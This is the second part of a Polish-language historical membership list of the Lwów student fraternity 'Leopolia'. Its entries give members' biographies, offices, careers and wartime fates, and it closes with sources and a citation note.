 104. Zbigniew Schneigert, (30 marca 1910 we Lwowie - 30 października 1998 w Zakopanym) s. Leopolda i Stefanii z d. Abrysowska, student i absolwent PL, akt. 1928-35, działacz Polskiego Towarzystwa Tatrzańskiego, w czasie wojny w konspiracji we Lwowie, w 1945 osiedlił się w Zakopanym, dyrektor Państwowych Kolei Linowych 1945-50, nauczyciel w Technikum Budowlanym w Zakopanym 1951-84, jednocześnie pracował w różnych instytucjach zajmujących się projektowaniem i budową kolei liniowych i wyciągów narciarskich w Tatrach, Karpatach i Sudetach, wspólnie ze speleologiem i odkrywcą tatrzańskich jaskiń Stefanem Zwolińskim wykonał dokumentację udostępniającą Jaskinię Mroźną, doktorat Politechnika Śląska 1966, projektował mosty, domy i wyciągi narciarskie, twórca i działacz SD na Podhalu, przez 40 lat członek Miejskiej Rady Narodowej w Zakopanym, w tym przez cztery kadencje jako jej wiceprzewodniczący, w 1981 prezes reaktywowanego Polskiego Towarzystwa Tatrzańskiego, w 1989 współzałożyciel i pierwszy prezes Towarzystwa Przyjaciół Lwowa w Zakopanym, autor prac z zakresu budowy kolei liniowych, nowoczesnej broni rakietowej i kosmicznej, pochowany na Nowym Cmentarzu przy ul. Nowotarskiej w Zakopanym [Źródła (poza wskazanymi poniżej spisu członków): relacja Ryszarda Sawickiego]

 105. Roman Sienkiewicz, ( - 1978 w Krośnie) akt. 1924-28, wiceprezes 1924/25 (od marca 1925), olderman sem. let. 1926/27, prezes Lwowskiego Komitetu Akademickiego, mgr praw, adwokat w Krośnie
 106. Zdzisław Skarbiński, wiceprezes sem. zim. 1930/31, inż. mechanik, w I Dywizji Pancernej gen. Stanisława Maczka

  Alfred Skubiejski, 1933 r.

 107. Alfred Skubiejski, (1912 w Borysławiu, student Wydziału Inżynieryjnego PL, potem prawa UJK, sekretarz sem. let. 1931/32, sekretarz sem. zim. 1932/33, olderman 1932 i 1933, mgr praw UJK, po wojnie na emigracji w Wielkiej Brytanii

 108. Lesław Socha, młodszy brat Zbigniewa (Leopolia), inż. mechanik, asystent w Mechanicznej Stacji Doświadczalnej na PL, konstruktor lotniczy, w 1939 na stypendium we Francji, po wojnie na emigracji w Stanach Zjednoczonych
 109. Zbigniew Socha, starszy brat Lesława (Leopolia), student prawa UJK, sekretarz Towarzystwa Biblioteki Słuchaczy Prawa 1923, mgr praw
 110. Otto Sochański, ( - 1960 w Katowicach) akt. 1925-30, prezes Towarzystwa Biblioteki Słuchaczy Prawa 1925 oraz Czytelni Akademickiej 1926, mgr praw

  Tadeusz Sokołowski, 1933 r.

 111. Tadeusz Sokołowski, (1915 - 16 stycznia 1945 w Grodzisku Mazowieckim) s. sędziego, student i absolwent 1937 prawa UJK, akt. 1933-39, sekretarz (?) sem. zim. 1933/34, wiceprezes, dwukrotny prezes i olderman, zmarł w wyniku spękania pęcherzyków płucnych od fali ciśnieniowej bomby sowieckiej zrzuconej na ludność cywilną miasteczka

 112. Zdzisław Stahl, s. Leonarda, akt. 1924-28, prezes Czytelni Akademickiej 1923, dr praw, działacz narodowy, po wojnie na emigracji w Wielkiej Brytanii
 113. Marian Steller, akt. 1925-29, lekarz med.

  Adam Stelmachowicz, 1933 r.

 114. Adam Stelmachowicz, student PL, akt. 1930-38

 115. Stanisław Edward Marian Strawiński, (9 lipca 1906 we Lwowie - 5 marca 1980 w Harrow w Wielkiej Brytanii)
 116. Jerzy Styputa,

  Jerzy Szajner, ok. 1932 r.

 117. Jerzy Szajner, (7 lutego 1909 - 21 lutego 1996 we Wrocławiu) absolwent Gimnazjum im. Króla Stefana Batorego, student i absolwent prawa UJK 1928-32, sekretarz sem. zim. 1930/31, po studiach aplikant sędziowski, asesor prokuratorski, prokurator, w 1946 ekspatriowany do Wrocławia, pracował jako radca prawny, pochowany na Cmentarzu św. Rodziny we Wrocławiu

 118. Antoni Szczepankiewicz, (24 czerwca 1916 w Radziechowie - 1989 w Gliwicach) student i absolwent 1941 med. UJK, akt. 1934-39, chirurg, ortopeda, po wojnie lekarz w Gliwicach
 119. Roman Śnieżko, po wojnie na emigracji w Paryżu, kierownik firmy “Wagons Lits” w Paryżu

  Stanisław Świątkowski, sem. zim. 1933/34 r. (?)

 120. Stanisław Świątkowski, (1913 we Lwowie - wrzesień 1939) “Fafu”, student i absolwent prawa UJK, akt. 1931-38, wiceprezes sem. zim. 1933/34, prezes, pchor. rez. piechoty, w wojnie obronnej 1939 w 12 Dywizji Piechoty Podolskiej, poległ

 121. Tapkowski, początkowo (?) w Korporacji Znicz, przeszedł (?) do Leopolii
 122. Tarnawski, akt. 1930-34
 123. Tadeusz Telakowski, założyciel Leopolii, sekretarz 1923/24, mgr praw
 124. Kazimierz Terlecki, (1909 - 10 maja 1996 w Warszawie) student PL i PW, mgr inż.
 125. Józef Tyszkowski, ( - 1974 ? w Warszawie) student prawa UJK, założyciel Leopolii, prezes 1921/22 oraz wiceprezes 1922 i 1923 Bratniej Pomocy Studentów UJK, sekretarz Czytelni Akademickiej 1924, urzędnik Banku Gospodarstwa w Warszawie [prawd. Józef Gozdawa Tyszkowski (1889-1974) hodowca koni arabskich, uratował prze grabieżą i przyprowadził spod Lwowa do Nowego Dworu w 1946 stadninę koni czystej krwi arabskiej, później kierownik Państwowej Stadniny Koni Arabskich w Nowym Dworze, odznaczony najwyższym wyróżnieniem łowieckim “Złomem”]
 126. Zenon Wachlowski, (3 października 1905 we Lwowie - 1940 w Katyniu) s. Zenona i Ludwiki z Turteltaubów, student i absolwent prawa UJK, założyciel Leopolii, sekretarz 1924/25 (od marca 1925), prezes sem. zim. 1925/26, wiceprzewodniczący (?) VI Zjazdu ZPKA, wiceprezes 1925 oraz prezes 1926/27 Towarzystwa Biblioteki Słuchaczy Prawa, doc. prawa politycznego UJK, aresztowany przez NKWD, zamordowany przez NKWD (”ukraińska lista katyńska”)

  Zbigniew Wajda, 1933 r.

 127. Zbigniew Henryk Wajda, (1904 we Lwowie - 11 sierpnia 1979 w Warszawie) akt. 1925-30, mgr prawa, ekonomii, handlu zagranicznego, prokurent w banku, żołnierz Brygady Karpackiej i II Korpusu, po wojnie działacz polonijny w Chicago, m.in. zastępca red. naczelnego “Dziennika Związkowego” w Chicago, przedstawiciel Rady Polonii Amerykańskiej na Polskę, pochowany na warszawskich Powązkach, odznaczony m.in. Medalem Wojska i Africa Star

  Jan Wasiewicz, 1933 r.

 128. Jan Wasiewicz, “Pinio”, akt. 1930-38, po wojnie na emigracji w Wielkiej Brytanii

 129. Józef Weigel, (1906 we Lwowie - 4 lipca 1941 we Lwowie) s. Kaspra (Leopolia), mgr praw, dpl. 1932, aresztowany wraz z ojcem, zamordowany przez Niemców na Wzgórzach Wuleckich
 130. Stanisław Wierzbicki,

  Stanisław Wierzbowski, 1933 r.

 131. Stanisław Wierzbowski, ( - grudzień 2003) “Jajo” sekretarz 1933, mgr inż., pchor. rez. artylerii, adiutant dowódcy 3 dywizjonu 5 Pułku Artylerii Lekkiej Armii “Pomorze” (?), od stycznia 1943 w obozach koncentracyjnych w Auschwitz, Flossenburg, Dachau i Mittelton

  Juljusz Wiktor, 1933 r.

 132. Juljusz (Juljan) Wiktor, (1910 we Lwowie - 1941 w Workucie) student i absolwent 1938 elektryki PL, akt. 1929-36, olderman sem. zim. 1932/33, w czasie wojny oficer AK, aresztowany przez NKWD we Lwowie, zesłany do łagrów Workuty, pracując w kopalni węgla zginął w wypadku zgnieciony przez wykolejany wagonik

 133. Tadeusz Woch, (zm. we Wrocławiu) akt. 1935-39, mgr, radca Izby Skarbowej
 134. Tadeusz Wojtasiewicz, prawnik
 135. Bonisław Wolenin, akt. 1924-28, prawnik, przed wojną w Ministerstwie Skarbu w Warszawie
 136. Franciszek Wolański, student i absolwent 1928 prawa UJK (z tytułem dr prawa), c. 1923, akt. 1923-28, skarbnik 1923/24, po wojnie sędzia Sądu Wojewódzkiego w Rzeszowie

  Tadeusz Wójtowicz, sem. zim. 1933/34 r. (?).

 137. Tadeusz Wójtowicz, (1911 w Drohobyczu - 1987 w San Francisco) akt. 1930-38, prezes sem. zim. 1933/34, po wojnie na emigracji w Stanach Zjednoczonych, posiadał własną firmę maklerską “T.W. Wyatt” w San Francisco

 138. Janusz Wyrzykowski, (?) student Wyższej Szkoły Handlu Zagranicznego (?), akt. 1934
 139. Antoni Wysocki, student Wyższej Szkoły Handlu Zagranicznego (?), akt. 1936-39
 140. Zbigniew Wzorek, (?) ( - lata 90-te) inż. architekt, po wojnie w Krakowie
 141. Franciszek Zachariasiewicz, (1905-1991) mgr praw, adwokat
 142. Czesław Zagórski, (1906 - po 2001) student i absolwent 1939 med. UJK, c. 1930, dr med. UP 1946, pulmonolog

  Andrzej Ludwik Zahradnik, 1928 r.

 143. Andrzej Ludwik Zahradnik, (16 września 1902 w Kosowie Huculskim - ) “Ludek”, student i absolwent 1935 med. UJK, założyciel Leopolii, olderman r.a. 1924/25, prezes sem. let. 1924/25, kurator Zagończyka, kurator Obotritii 1927/28, delegat na I Radę Naczelną ZPKA, odznaczony Dyplomem Zasługi i Złotą Odznaką ZPKA 1930, dr med. UJK 1939, internista, po wojnie ordynator Oddziału Zakaźnego Szpitala Miejskiego w Poznaniu

 144. Jerzy Zajączkowski, “Ucio”, absolwent Gimnazjum im. Henryka Jordana we Lwowie, student prawa UJK, założyciel Leopolii, po wojnie na emigracji w Wielkiej Brytanii
 145. Zbigniew Zawistowski, “Klozet” akt. 1925-29, mgr praw, sędzia wojskowy - audytor, po wojnie na emigracji w Argentynie, literat
 146. Janusz Zdziarski, (1913 - ) brat Ryszarda (Concordia), akt. 1932-39, student UJK i UW, mgr praw, adwokat
 147. Zieliński, lekarz med.
 148. Franciszek Żeleski, (1907 - 1 września 1998) s. Zygmunta, brat Stanisława (Leopolia) i Władysława (Gnomia), mgr praw, adwokat
 149. Stanisław Żeleski, (1902/3-1974) s. Zygmunta, brat Władysława (Gnomia) i Franciszka (Leopolia), c. 1923, wiceprezes sem. let. 1925/26, prezes sem. let. 1928/29, mgr praw, adwokat

  Jerzy Żurowski, 1928 r.

 150. Jerzy Paweł Florian Żurowski, (189? prawd. w Kołomyji - koniec lat 20.) herbu Leliwa, s. Władysława (prawnika, urzędnika państwowego) i Wandy z Zarembów, ranny przy obronie Lwowa, uczestnik wojny polsko-rosyjskiej 1920, student i absolwent prawa UJK (mgr praw), założyciel Leopolii, pierwszy prezes 1923/24, wiceprezes 1921/22 oraz prezes 1922 i 1923 Bratniej Pomocy Studentów UJK, zmarł na gruźlicę płuc, pochowany w Starym Siole pod Lwowem

Listę członków opracowano na podstawie:

1) Zbysław Popławski, Lista członków Polskiej Korporacji Akademickiej Leopolia (Lwów), (w:) Polskie Korporacje Akademickie 1996, nr 11, s. 51 i n.,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Leopolia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 18 IX 2010 r.
Ostatnia zmiana: 2 IV 2020 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Korporacja Akademicka “Leopolia” we Lwowie, (na:) www.archiwumkorporacyjne.pl, stan 2 IV 2020 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }